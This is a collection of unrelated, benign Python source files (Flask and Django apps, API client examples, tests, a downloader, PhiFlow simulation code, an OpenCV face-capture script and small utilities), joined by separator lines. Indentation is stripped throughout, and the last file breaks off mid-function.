# @app.route('/updateRecordForID/<string:id>', methods = ["PUT"])
# def update_record(id):
# data = mongo.db.myData.find({"_id":id})
@app.route('/getDonald', methods=['GET'])
def getDonald():
data = mongo.db.myData.find({"name": "Donald"})
output = json.dumps(list(data), default=str)
return jsonify({'result': output})
@app.route('/editReviewCount/<int:adder>', methods=['PUT'])
def editReviewCount(adder):
data = mongo.db.myData.find({"name": "Donald"})
# mongo.db.myData.update({"_id": obj["_id"]}, {"$set":{'review_count': review_val + adder}}, True)
for obj in data:
review_val = obj['review_count']
mongo.db.myData.update_one({"_id": obj["_id"]}, {
"$set": {'review_count': review_val + adder}}, True)
return jsonify({'result': True})
if __name__ == '__main__':
app.run(debug=True)
|
import httplib2
from apiclient import errors, discovery
from oauth2client import client
from apiclient.http import BatchHttpRequest
class GmailService(object):
def __init__(self, credentialsJson):
credentials = client.OAuth2Credentials.from_json(credentialsJson)
http_auth = credentials.authorize(httplib2.Http())
self.gmailService = discovery.build('gmail', 'v1', http=http_auth)
def getCurrentUser(self):
return self.gmailService.users().getProfile(userId='me').execute()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_project-skeleton
----------------------------------
Tests for `project-skeleton` module.
"""
import unittest
from project-skeleton import project-skeleton
class TestProject-skeleton(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_000_something(self):
pass
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
|
# -*- coding: utf-8 -*-
import os
import subprocess
from pieprompt.parts import Part
from pieprompt.util import Color
from pieprompt.util import colorize
from pieprompt.util import run_command
def get_git_part():
# TODO: Move this checking logic elsewhere
no_git = os.environ.get('PIEPROMPT_NO_GIT', '')
no_git_folders = [
os.path.normpath(os.path.expanduser(path))
for path in no_git.split(',')
]
cwd = os.getcwd()
if any([
cwd.startswith(folder)
for folder in no_git_folders
]):
return None
try:
git_dir = run_command(('git', 'rev-parse', '--git-dir'))
except subprocess.CalledProcessError:
return None
if not os.path.isdir(git_dir):
return None
branch_name = run_command(('git', 'symbolic-ref', '--short', '-q', 'HEAD'))
branch_info = ''
if os.path.isdir(os.path.join(git_dir, '..', '.dotest')):
branch_info = '|AM/REBASE'
elif os.path.isfile(os.path.join(git_dir, '.dotest-merge', 'interactive')):
branch_info = '|REBASE-i'
elif os.path.isdir(os.path.join(git_dir, '.dotest-merge')):
branch_info = '|REBASE-m'
elif os.path.isfile(os.path.join(git_dir, 'MERGE_HEAD')):
branch_info = '|MERGING'
elif os.path.isfile(os.path.join(git_dir, 'BISECT_LOG')):
branch_info = '|BISECTING'
git_status = run_command(('git', 'status'))
is_clean = 'nothing to commit, working' in git_status.split('\n')[-1]
bits = ['git:(', branch_name, ')']
if not is_clean:
bits.extend([' ', '✗'])
colored_output = ''.join((
colorize(Color.BLUE, bits[0]),
colorize(Color.RED, bits[1]),
colorize(Color.BLUE, bits[2]),
))
if len(bits) > 3:
colored_output += bits[3]
colored_output += colorize(Color.UHOH, bits[4])
return Part(
colored_output=colored_output,
raw_length=sum([len(bit) for bit in bits]),
)
|
from django.db import models
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from django.utils import timezone
# Create your models here.
class Message(models.Model):
author = models.ForeignKey(User, related_name='author_messages', on_delete=models.CASCADE)
content = models.TextField()
read = models.BooleanField(default=False)
timestamp = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.author.username
def last_10_messages():
return Message.objects.order_by('timestamp').all()[:10]
class Contact(models.Model):
user = models.ForeignKey(User, related_name='friends',on_delete=models.CASCADE)
friends = models.ManyToManyField('self', blank=True)
class ChatParticipants(models.Model):
participants = models.ForeignKey(User, related_name='group_members', on_delete=models.CASCADE)
group_members = models.ManyToManyField('self', blank=True)
class Messages(models.Model):
contact = models.ForeignKey(ChatParticipants, related_name="messages", on_delete=models.CASCADE)
content = models.TextField()
timestamp = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.contact.user.username
class Chat(models.Model):
chat_id = models.CharField(max_length=20, unique=True)
participants = models.ManyToManyField(User, related_name='chat', blank=True)
deleted = models.ManyToManyField(User, related_name='deleted_by', blank=True)
messages = models.ManyToManyField(Message, blank=True)
date_updated = models.DateTimeField(default=timezone.now)
accept = models.BooleanField(default=False)
initiator = models.ForeignKey(User, on_delete=models.CASCADE, related_name='init')
receiver = models.ForeignKey(User, on_delete=models.CASCADE, related_name='receiver', blank=True, null=True)
def __str__(self):
return "{}".format(self.pk)
class ReportChat(models.Model):
chat = models.ForeignKey(Chat, related_name='report_chat', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='user', on_delete=models.CASCADE)
content = models.TextField()
def __str__(self):
return "{} - {}".format(self.chat, self.user)
|
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# The Initial Developer of the Original Code is the Mozilla Foundation.
# Portions created by the Initial Developer are Copyright (C) 2012
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Victor Ng (vng@mozilla.com)
#
# ***** END LICENSE BLOCK *****
METLOG_METHOD_NAME = 'cef'
VALID_FACILITY = ['KERN', 'USER', 'MAIL', 'DAEMON', 'AUTH', 'LPR',
'NEWS', 'UUCP', 'CRON', 'LOCAL0', 'LOCAL1', 'LOCAL2', 'LOCAL3',
'LOCAL4', 'LOCAL5', 'LOCAL6', 'LOCAL7', ]
VALID_PRIORITY = ['EMERG', 'ALERT', 'CRIT', 'ERR', 'WARNING',
'NOTICE', 'INFO', 'DEBUG']
VALID_OPTIONS = ['PID', 'CONS', 'NDELAY', 'NOWAIT', 'LOG_PERROR']
class InvalidArgumentError(RuntimeError):
pass
def check_config(syslog_options, syslog_facility, syslog_ident,
syslog_priority):
if syslog_options:
if not isinstance(syslog_options, basestring):
msg = "Option should be one of: %s" % str(VALID_OPTIONS)
raise InvalidArgumentError(msg)
if syslog_options:
for opt in syslog_options.split(','):
if opt not in VALID_OPTIONS:
msg = "Option should be one of: %s" % str(VALID_OPTIONS)
raise InvalidArgumentError(msg)
if syslog_facility:
if syslog_facility not in VALID_FACILITY:
msg = "Facility should be one of: %s" % str(VALID_FACILITY)
raise InvalidArgumentError(msg)
if syslog_ident:
if not isinstance(syslog_ident, basestring):
msg = "syslog_ident should be a string"
raise InvalidArgumentError(msg)
if syslog_priority:
if syslog_priority not in VALID_PRIORITY:
msg = "Priority should be one of : %s" % str(VALID_PRIORITY)
raise RuntimeError(msg)
def config_plugin(config):
"""
CEF requires no special configuration
"""
syslog_options = config.pop('syslog_options', None)
syslog_facility = config.pop('syslog_facility', None)
syslog_ident = config.pop('syslog_ident', None)
syslog_priority = config.pop('syslog_priority', None)
check_config(syslog_options, syslog_facility, syslog_ident,
syslog_priority)
if len(config) > 0:
msg = "Unexpected arguments: %s" % str(config.keys())
raise InvalidArgumentError(msg)
cef_meta = {}
cef_meta['syslog_options'] = syslog_options
cef_meta['syslog_facility'] = syslog_facility
cef_meta['syslog_ident'] = syslog_ident
cef_meta['syslog_priority'] = syslog_priority
def log_cef(self, name, severity, environ, config, username='none',
signature=None, **kw):
"""Creates a CEF record, and emit it to metlog in the fields blob.
Args:
- name: name to log
- severity: integer from 0 to 10
- environ: the WSGI environ object
- config: configuration dict
- signature: CEF signature code - defaults to name value
- username: user name - defaults to 'none'
- extra keywords: extra keys used in the CEF extension
"""
from cef import _get_fields, _format_msg, _filter_params
config = _filter_params('cef', config)
fields = _get_fields(name, severity, environ, config,
username=username, signature=signature, **kw)
msg = _format_msg(fields, kw)
self.metlog(type='cef', payload=msg, fields={'cef_meta': cef_meta})
# Return the formatted message
return msg
log_cef.metlog_name = METLOG_METHOD_NAME
log_cef.cef_meta = cef_meta
return log_cef
|
"""
The example returns a JSON response whose content is the same as that in
../resources/personality-v3-expect2.txt
"""
from __future__ import print_function
import json
from os.path import join, dirname
from watson_developer_cloud import PersonalityInsightsV3
personality_insights = PersonalityInsightsV3(
version='2016-10-20',
## url is optional, and defaults to the URL below. Use the correct URL for your region.
# url='https://gateway.watsonplatform.net/personality-insights/api',
username='YOUR SERVICE USERNAME',
password='YOUR SERVICE PASSWORD')
## If service instance provides API key authentication
# personality_insights = PersonalityInsightsV3(
# version='2016-10-20',
# ## url is optional, and defaults to the URL below. Use the correct URL for your region.
# url='https://gateway.watsonplatform.net/personality-insights/api',
# iam_api_key='your_api_key')
with open(join(dirname(__file__), '../resources/personality-v3.json')) as \
profile_json:
profile = personality_insights.profile(
profile_json.read(), content_type='application/json',
raw_scores=True, consumption_preferences=True)
print(json.dumps(profile, indent=2))
|
from flask import Blueprint, jsonify, request
root_api = Blueprint("root_api", __name__)
@root_api.route("/api/recent")
def get_recent_nodes():
# nodes, references = recent_papers_and_references()
return jsonify({"nodes": None, "references": None})
|
def fantasy():
import nflgame
x=int(input("What year?: "))
y=int(input("What week?: "))
z=int(input("How many players?: "))
print()
if x>=2009:
if x<2020:
if y>0:
if y<=17:
games = nflgame.games(x, week=y)
players = nflgame.combine_game_stats(games)
for p in players.rushing().sort('rushing_yds').limit(z):
msg = '{}: {} carries for {} yards and {} TDs'
print( msg.format(p, p.rushing_att, p.rushing_yds, p.rushing_tds))
print()
for p in players.passing().sort('passing_yds').limit(z):
msg = '{}: {} passes for {} yards and {} TDs'
print( msg.format(p, p.passing_att, p.passing_yds, p.passing_tds))
print()
for p in players.receiving().sort('receiving_yds').limit(z):
msg = '{}: {} receptions for {} yards and {} TDs'
print( msg.format(p, p.receiving_rec, p.receiving_yds, p.receiving_tds))
print()
for p in players.kicking().sort('kicking_fgm').limit(z):
msg = '{}: {} out of {} field goals made'
print( msg.format(p, p.kicking_fgm, p.kicking_fga))
else:
print("Invalid input")
else:
print("Invalid input")
else:
print("Invalid input")
else:
print("Invalid input")
|
import pytest
import palindrome
# Successful test
def test_empty():
assert palindrome.palindrome("") == False, "Empty string failed"
# Successful test
def test_racecar():
assert palindrome.palindrome("racecar"), "racecar failed"
# Failed test
def test_Anna():
assert palindrome.palindrome("Anna"), "Anna string failed"
# Failed test
def test_spaces():
assert palindrome.palindrome(" racecar"), "Space + racecar failed"
|
# coding: utf-8
import requests
import threading
import os
import sys
import time
import datetime
lock = threading.Lock()
class downloader:
# 构造函数
def __init__(self):
# 设置url
self.url=sys.argv[1]
# 设置线程数
self.num=8
# 文件名从url最后取
self.name=self.url.split('/')[-1]
# 用head方式去访问资源
r = requests.head(self.url)
# 取出资源的字节数
self.size = int(r.headers['Content-Length'])
print('文件 %s 大小为 %s bytes' % (self.name, self.size))
print('####################################')
def get_range(self):
ranges=[]
# 比如size是50,线程数是4个。offset就是12
offset = int(self.size/self.num)
for i in range(self.num):
if i==self.num-1:
# 最后一个线程,不指定结束位置,取到最后
#ranges.append((i*offset,''))
ranges.append((i*offset,self.size))
else:
# 没个线程取得区间
ranges.append((i*offset,(i+1)*offset))
# range大概是[(0,12),(12,24),(25,36),(36,'')]
return ranges
def download(self,start,end):
headers={'Range':'Bytes=%s-%s' % (start,end),'Accept-Encoding':'*'}
# 获取数据段
res = requests.get(self.url,headers=headers, stream=True)
# 加锁,seek到指定位置写文件
lock.acquire()
self.fd.seek(start)
self.fd.write(res.content)
lock.release()
print('[%s -> %s] \tdownload success' % (start,end))
def run(self):
# 打开文件,文件对象存在self里
self.fd = open(self.name,'wb')
self.fd.truncate(self.size)
thread_list = []
n = 0
start_time = time.time()
#start_time = datetime.datetime.now().replace(microsecond=0)
for ran in self.get_range():
start,end = ran
print('Thread %d:\t start_pos[%s] -> end_pos[%s]'%(n,start,end))
n+=1
# 开线程
thread = threading.Thread(target=self.download,args=(start,end))
thread.start()
thread_list.append(thread)
print('####################################')
for i in thread_list:
# 设置等待
i.join()
end_time = time.time()
#end_time = datetime.datetime.now().replace(microsecond=0)
print('####################################')
print('文件 %s 下载完成!\n耗时:%f 秒' % (self.name, end_time-start_time))
self.fd.close()
if __name__=='__main__':
# 新建实例
down = downloader()
# 执行run方法
down.run()
|
import warnings
from numbers import Number
from typing import Union
from phi import math, field
from phi.field import CenteredGrid, StaggeredGrid, PointCloud, Field, mask
from phi.geom import Box, GridCell, Sphere, union, assert_same_rank
from phi.geom import Geometry
from phiml.math import Tensor, channel, instance
from phiml.math.extrapolation import ZERO, ONE, PERIODIC, BOUNDARY
from phiml.math import spatial
from phiml.math.extrapolation import combine_sides
from .fluid import Obstacle # for compatibility
warnings.warn("""Domain (phi.physics._boundaries) is deprecated and will be removed in a future release.
Please create grids directly, replacing the domain with a dict, e.g.
domain = dict(x=64, y=128, bounds=Box(x=1, y=1))
grid = CenteredGrid(0, **domain)""", FutureWarning, stacklevel=2)
def _create_boundary_conditions(obj: Union[dict, tuple, list], spatial_dims: tuple) -> dict:
"""
Construct mixed boundary conditions from from a sequence of boundary conditions.
Args:
obj: single boundary condition or sequence of boundary conditions
Returns:
Mixed boundary conditions as `dict`.
"""
if isinstance(obj, dict) and all(dim in obj for dim in spatial_dims):
spatial_dims = obj.keys()
obj = tuple(obj.values())
elif isinstance(obj, dict):
return obj
if isinstance(obj, (tuple, list)):
keys = obj[0].keys() if isinstance(obj[0], dict) else obj[0][0].keys()
result = {}
for key in keys:
dim_to_extrap = {dim: (extrap[0][key], extrap[1][key]) if isinstance(extrap, (tuple, list)) else extrap[key]
for dim, extrap in zip(spatial_dims, obj)}
result[key] = combine_sides(**dim_to_extrap)
return result
else:
raise ValueError(obj)
OPEN = {
'scalar': ZERO,
'vector': BOUNDARY,
'active': ZERO,
'accessible': ONE,
}
STICKY = {
'scalar': BOUNDARY,
'vector': ZERO,
'active': ZERO,
'accessible': ZERO,
}
PERIODIC = {
'scalar': PERIODIC,
'vector': PERIODIC,
'active': PERIODIC,
'accessible': PERIODIC,
}
class Domain:
def __init__(self, resolution: Union[math.Shape, tuple, list] = math.EMPTY_SHAPE, boundaries: Union[dict, tuple, list] = OPEN, bounds: Box = None, **resolution_):
"""
The Domain specifies the grid resolution, physical size and boundary conditions of a simulation.
It provides convenience methods for creating Grids fitting the domain, e.g. `grid()`, `vector_grid()` and `staggered_grid()`.
Also see the `phi.physics` module documentation at https://tum-pbs.github.io/PhiFlow/Physics.html
Args:
resolution: grid dimensions as Shape or sequence of integers. Alternatively, dimensions can be specified directly as kwargs.
boundaries: specifies the extrapolation modes of grids created from this Domain.
Default materials include OPEN, CLOSED, PERIODIC.
To specify boundary conditions per face of the domain, pass a sequence of boundaries or boundary pairs (lower, upper)., e.g. [CLOSED, (CLOSED, OPEN)].
See https://tum-pbs.github.io/PhiFlow/Physics.html#boundary-conditions .
bounds: physical size of the domain. If not provided, the size is equal to the resolution (unit cubes).
"""
warnings.warn("Domain is deprecated and will be removed in a future release. Use a dict instead, e.g. CenteredGrid(values, extrapolation, **domain_dict)", DeprecationWarning, stacklevel=2)
warnings.warn("Domain is deprecated and will be removed in a future release. Use a dict instead, e.g. CenteredGrid(values, extrapolation, **domain_dict)", FutureWarning, stacklevel=2)
self.resolution: math.Shape = spatial(resolution) & spatial(**resolution_)
assert self.resolution.rank > 0, "Cannot create Domain because no dimensions were specified."
""" Grid dimensions as `Shape` object containing spatial dimensions only. """
self.boundaries: dict = _create_boundary_conditions(boundaries, self.resolution.names)
""" Outer boundary conditions. """
self.bounds: Box = Box(math.const_vec(0, self.resolution), math.wrap(self.resolution, channel('vector'))) if bounds is None else bounds
""" Physical dimensions of the domain. """
def __repr__(self):
return '(%s, size=%s)' % (self.resolution, self.bounds.size)
@property
def shape(self) -> math.Shape:
""" Alias for `Domain.resolution` """
return self.resolution
@property
def rank(self) -> int:
"""Number of spatial dimensions of the simulation; spatial rank. 1 = 1D, 2 = 2D, 3 = 3D, etc."""
return self.resolution.rank
@property
def dx(self) -> math.Tensor:
"""Size of a single grid cell (physical size divided by resolution) as `Tensor`"""
return self.bounds.size / self.resolution
@property
def cells(self) -> GridCell:
"""
Returns the geometry of all cells as a `Box` object.
The box will have spatial dimensions matching the resolution of the Domain, i.e. `domain.cells.shape == domain.resolution`.
"""
return GridCell(self.resolution, self.bounds)
def center_points(self) -> math.Tensor:
"""
Returns a Tensor enumerating the physical center locations of all cells within the Domain.
This is equivalent to calling `domain.cells.center`.
The shape of the returned Tensor extends the domain resolution by one vector dimension.
"""
return self.cells.center
def grid(self,
value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
type: type = CenteredGrid,
extrapolation: math.Extrapolation = 'scalar') -> Union[CenteredGrid, StaggeredGrid]:
"""
Creates a grid matching the resolution and bounds of the domain.
The grid is created from the given `value` which must be one of the following:
* Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
* Field: the given value is resampled to the grid cells of this Domain.
* Tensor with spatial dimensions matching the domain resolution: grid values will equal `value`.
* Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
* function(location: Tensor) returning one of the above.
Args:
value: constant, Field, Tensor or function specifying the grid values
type: type of Grid to create, must be either CenteredGrid or StaggeredGrid
extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['scalar']
Returns:
Grid of specified type
"""
extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
return type(value, resolution=self.resolution, bounds=self.bounds, extrapolation=extrapolation)
def scalar_grid(self,
value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
extrapolation: Union[str, math.Extrapolation] = 'scalar') -> CenteredGrid:
"""
Creates a scalar grid matching the resolution and bounds of the domain.
The grid is created from the given `value` which must be one of the following:
* Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
* Scalar `Field`: the given value is resampled to the grid cells of this Domain.
* Tensor with spatial dimensions matching the domain resolution: grid values will equal `value`.
* Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
* function(location: Tensor) returning one of the above.
* Native tensor: the number and order of axes are matched with the resolution of the domain.
Args:
value: constant, Field, Tensor or function specifying the grid values
extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['scalar']
Returns:
`CenteredGrid` with no channel dimensions
"""
extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
if isinstance(value, Field):
assert_same_rank(value.spatial_rank, self.rank, f"Cannot resample {value.spatial_rank}D field to {self.rank}D domain.")
elif isinstance(value, Tensor):
assert value.shape.channel.rank == 0
elif isinstance(value, (Number, Geometry)):
pass
elif callable(value):
pass
else:
try:
value = math.wrap(value, self.resolution)
except math.IncompatibleShapes:
pass
value = math.wrap(value)
result = CenteredGrid(value, resolution=self.resolution, bounds=self.bounds, extrapolation=extrapolation)
assert result.shape.channel_rank == 0
return result
def vector_grid(self,
value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
type: type = CenteredGrid,
extrapolation: Union[math.Extrapolation, str] = 'vector') -> Union[CenteredGrid, StaggeredGrid]:
"""
Creates a vector grid matching the resolution and bounds of the domain.
The grid is created from the given `value` which must be one of the following:
* Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
* Field: the given value is resampled to the grid cells of this Domain.
* Tensor with spatial dimensions matcing the domain resolution: grid values will equal `value`.
* Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
* function(location: Tensor) returning one of the above.
The returned grid will have a vector dimension with size equal to the rank of the domain.
Args:
value: constant, Field, Tensor or function specifying the grid values
type: class of Grid to create, must be either CenteredGrid or StaggeredGrid
extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['vector']
Returns:
Grid of specified type
"""
extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
result = type(value, resolution=self.resolution, bounds=self.bounds, extrapolation=extrapolation)
if result.shape.channel_rank == 0:
result = result.with_values(math.expand(result.values, channel(vector=self.rank)))
else:
assert result.shape.get_size('vector') == self.rank
return result
def staggered_grid(self,
value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
extrapolation: Union[math.Extrapolation, str] = 'vector') -> StaggeredGrid:
"""
Creates a staggered grid matching the resolution and bounds of the domain.
This is equal to calling `vector_grid()` with `type=StaggeredGrid`.
The grid is created from the given `value` which must be one of the following:
* Number (int, float, complex or zero-dimensional tensor): all grid values will be equal to `value`. This has a near-zero memory footprint.
* Field: the given value is resampled to the grid cells of this Domain.
* Tensor with spatial dimensions matcing the domain resolution: grid values will equal `value`.
* Geometry: grid values are determined from the volume overlap between grid cells and geometry. Non-overlapping = 0, fully enclosed grid cell = 1.
* function(location: Tensor) returning one of the above.
The returned grid will have a vector dimension with size equal to the rank of the domain.
Args:
value: constant, Field, Tensor or function specifying the grid values
extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['vector']
Returns:
Grid of specified type
"""
return self.vector_grid(value, type=StaggeredGrid, extrapolation=extrapolation)
def vector_potential(self,
value: Union[Field, Tensor, Number, Geometry, callable] = 0.,
extrapolation: Union[str, math.Extrapolation] = 'scalar',
curl_type=CenteredGrid):
if self.rank == 2 and curl_type == StaggeredGrid:
pot_bounds = Box(self.bounds.lower - 0.5 * self.dx, self.bounds.upper + 0.5 * self.dx)
alt_domain = Domain(self.boundaries, self.resolution + 1, bounds=pot_bounds)
return alt_domain.scalar_grid(value, extrapolation=extrapolation)
raise NotImplementedError()
def accessible_mask(self, not_accessible: Union[tuple, list], type: type = CenteredGrid, extrapolation='accessible') -> Union[CenteredGrid, StaggeredGrid]:
"""
Unifies domain and Obstacle or Geometry objects into a binary StaggeredGrid mask which can be used
to enforce boundary conditions.
Args:
not_accessible: blocked region(s) of space specified by geometries
type: class of Grid to create, must be either CenteredGrid or StaggeredGrid
extrapolation: (optional) grid extrapolation, defaults to Domain.boundaries['accessible']
Returns:
Binary mask indicating valid fields w.r.t. the boundary conditions.
"""
extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
accessible_mask = self.scalar_grid(mask(~union(not_accessible)), extrapolation=extrapolation)
if type is CenteredGrid:
return accessible_mask
elif type is StaggeredGrid:
return field.stagger(accessible_mask, math.minimum, extrapolation)
else:
raise ValueError('Unknown grid type: %s' % type)
def points(self,
points: Union[Tensor, Number, tuple, list],
values: Union[Tensor, Number] = None,
radius: Union[Tensor, float, int, None] = None,
extrapolation: math.Extrapolation = math.extrapolation.ZERO,
color: Union[str, Tensor, tuple, list, None] = None) -> PointCloud:
"""
Create a `phi.field.PointCloud` from the given `points`.
The created field has no channel dimensions and all points carry the value `1`.
Args:
points: point locations in physical units
values: (optional) values of the particles, defaults to 1.
radius: (optional) size of the particles
extrapolation: (optional) extrapolation to use, defaults to extrapolation.ZERO
color: (optional) color used when plotting the points
Returns:
`phi.field.PointCloud` object
"""
extrapolation = extrapolation if isinstance(extrapolation, math.Extrapolation) else self.boundaries[extrapolation]
if radius is None:
radius = math.mean(self.bounds.size) * 0.005
# --- Parse points: tuple / list ---
if isinstance(points, (tuple, list)):
if len(points) == 0: # no points
points = math.zeros(instance(points=0), channel(vector=1))
elif isinstance(points[0], Number): # single point
points = math.tensor([points], instance('points'), channel('vector'))
else:
points = math.tensor(points, instance('points'), channel('vector'))
elements = Sphere(points, radius)
if values is None:
values = math.tensor(1.)
return PointCloud(elements, values, extrapolation, add_overlapping=False, bounds=self.bounds, color=color)
def distribute_points(self,
geometries: Union[tuple, list],
points_per_cell: int = 8,
color: str = None,
center: bool = False) -> PointCloud:
"""
Transforms `Geometry` objects into a PointCloud.
Args:
geometries: Geometry objects marking the cells which should contain points
points_per_cell: Number of points for each cell of `geometries`
color (Optional): Color of PointCloud
center: Set all points to the center of the grid cells.
Returns:
PointCloud representation of `geometries`.
"""
geometries = mask(union(geometries)).at(self.grid())
initial_points = _distribute_points(geometries.values, points_per_cell, center=center)
return self.points(initial_points, color=color)
def _distribute_points(mask: math.Tensor, points_per_cell: int = 1, center: bool = False) -> math.Tensor:
"""
Generates points (either uniformly distributed or at the cell centers) according to the given tensor mask.
Args:
mask: Tensor with nonzero values at the indices where particles should get generated.
points_per_cell: Number of particles to generate at each marked index
center: Set points to cell centers. If False, points will be distributed using a uniform
distribution within each cell.
Returns:
A tensor containing the positions of the generated points.
"""
indices = math.to_float(math.nonzero(mask, list_dim=instance('points')))
temp = []
for _ in range(points_per_cell):
if center:
temp.append(indices + 0.5)
else:
temp.append(indices + (math.random_uniform(indices.shape)))
return math.concat(temp, dim=instance('points'))
|
from django.shortcuts import render
from django.http import HttpResponse
from .tasks import send_email_task
# Create your views here.
def email_sender(request):
send_email_task()
return HttpResponse('Wysłane!')
|
class Profile:
pi = 3.14
def __init__(self, theName, myAge):
self.name = theName
self.age = myAge
def growOlder(self):
self.age += 1
def greet(self, language):
if language=="English":
return "Greetings, %s" % self.name
else:
return "I don't speak freaky deaky dutch!"
# bad way
#p = Profile()
#p.age = 22
#with a constructor
# p = Profile() # this now raises an error
p = Profile('Jeremy', 25)
p.growOlder()
p.greet("Dutch")
p.pi
|
def new_node_id(node_name, node_counts):
uid = node_counts[node_name]
node_counts[node_name] += 1
return node_name + '-' + str(uid)
def add_node_instance(graph, node, node_counts, regions = None):
node_id = new_node_id(node.node_name, node_counts)
region_list = frozenset() if regions == None else frozenset(regions)
graph.add_node(node_id, data = node, pos = (0, 0), regions = region_list)
return node_id
def add_edge(graph, edge, node_counts, start = None, end = None, regions = None):
start_node = edge.start
end_node = edge.end
start_node_id = start if start != None else add_node_instance(graph, start_node, node_counts, regions = regions)
end_node_id = end if end != None else add_node_instance(graph, end_node, node_counts, regions = regions)
graph.add_edge(start_node_id, end_node_id, edge.edgeId, data = edge)
return (start_node_id, end_node_id)
def add_path(graph, path, node_counts, start = None, end = None, loop = False, regions = None):
path_start_node = path[0].start
path_end_node = path[-1].end
path_start_id = start if start != None else add_node_instance(graph, path_start_node, node_counts, regions = regions)
path_end_id = None
if loop:
path_end_id = path_start_id
elif end != None:
path_end_id = end
else:
path_end_id = add_node_instance(graph, path_end_node, node_counts, regions = regions)
path_ids = [path_start_id]
for i in range(len(path) - 1):
edge_id = path[i]
(_, edge_end_id) = add_edge(graph, edge_id, node_counts, start = path_ids[-1])
path_ids.append(edge_end_id)
add_edge(graph, path[-1], node_counts, start = path_ids[-1], end = path_end_id, regions = regions)
path_ids.append(path_end_id)
return path_ids
|
from errors.CooldownError import CooldownError
from errors.ExecutionError import ExecutionError
from errors.PermissionError import PermissionError
class Command:
def __init__(self,
parent,
script_name,
command_key,
permission,
permission_specific,
global_cooldown,
user_cooldown,
user,
user_name,
):
self.parent = parent
self.script_name = script_name
self.command_key = command_key
self.permission = permission
self.permission_specific = permission_specific
self.global_cooldown = global_cooldown
self.user = user
self.user_name = user_name
self.user_cooldown = user_cooldown
def user_has_permission(self):
return self.parent.HasPermission(self.user, self.permission, self.permission_specific)
def is_on_cooldown(self):
return self.is_on_global_cooldown() or self.is_on_user_cooldown()
def is_on_user_cooldown(self):
return self.parent.IsOnUserCooldown(self.script_name, self.command_key, self.user)
def is_on_global_cooldown(self):
return self.parent.IsOnCooldown(self.script_name, self.command_key)
def get_cooldown_duration(self):
global_cooldown = self.get_global_cooldown()
user_cooldown = self.get_user_cooldown()
return global_cooldown if global_cooldown > user_cooldown else user_cooldown
def get_global_cooldown(self):
return self.parent.GetCooldownDuration(self.script_name, self.command_key)
def get_user_cooldown(self):
return self.parent.GetUserCooldownDuration(self.script_name, self.command_key, self.user)
def set_cooldown(self):
self.set_global_cooldown()
self.set_user_cooldown()
def set_global_cooldown(self):
self.parent.AddCooldown(self.script_name, self.command_key, int(self.global_cooldown))
def set_user_cooldown(self):
self.parent.AddUserCooldown(self.script_name, self.command_key, self.user, int(self.user_cooldown))
def execute(self, fn, arguments):
if not self.user_has_permission():
raise PermissionError()
if self.is_on_cooldown():
raise CooldownError()
try:
return fn(self.parent, arguments)
except:
raise ExecutionError()
|
import cv2
import numpy as np
import os
nomb = input("Introduzca su nombre: ")
DirectoryPath = 'Database/'+str(nomb)
os.mkdir(DirectoryPath)
input("Presione enter para generar su carpeta de datos")
cam = cv2.VideoCapture(0)
cascPath = "Cascades/haarcascade_frontalface_default.xml"
faceCascade = cv2.CascadeClassifier(cascPath)
contador = 0
while(True):
_, imagen_marco = cam.read()
grises = cv2.cvtColor(imagen_marco, cv2.COLOR_BGR2GRAY)
rostro = faceCascade.detectMultiScale(grises, 1.5, 5)
for (x,y,w,h) in rostro:
cv2.rectangle(imagen_marco, (x,y), (x+w, y+h), (255,0,0), 4)
contador += 1
cv2.imwrite("Database/"+nomb+"/"+nomb+"_"+str(contador)+".jpg", grises[y:y+h, x:x+w])
cv2.imshow("Registrando tu perfil en la base de datos ...", imagen_marco)
if cv2.waitKey(1) & 0xFF == ord('e'):
break
elif contador >= 100:
break
cam.release()
cv2.destroyAllWindows()
|
idc = {}
|
# This file contains some random but maybe useful stuff
import numpy as np
from .out_utils import id_mapping
def get_fraction(gene_ids, FPKM, ignoreNan=False):
"""Get the fraction from FPKM"""
idx0 = 0
frac = np.zeros(len(FPKM))
for i in range(len(FPKM)+1):
if i >= len(FPKM) or gene_ids[idx0] != gene_ids[i]:
FPKM_sum = float(np.sum(FPKM[idx0:i]))
if FPKM_sum == 0:
if ignoreNan == True:
frac[idx0:i] = None
else:
frac[idx0:i] = 1.0/(i-idx0)
else:
frac[idx0:i] = FPKM[idx0:i] / FPKM_sum
idx0 = i
return frac
def loadresult(file_name, tran_ids, gene_ids=None, method="dice",
ignoreNan=False):
"""
Load results for isoforms from different methods.
------------------------------------------------
Methods supported: DICEseq, BRIE, MISO, Cufflinks, Kallisto, flux, spanki
"""
frac = np.zeros(len(tran_ids))
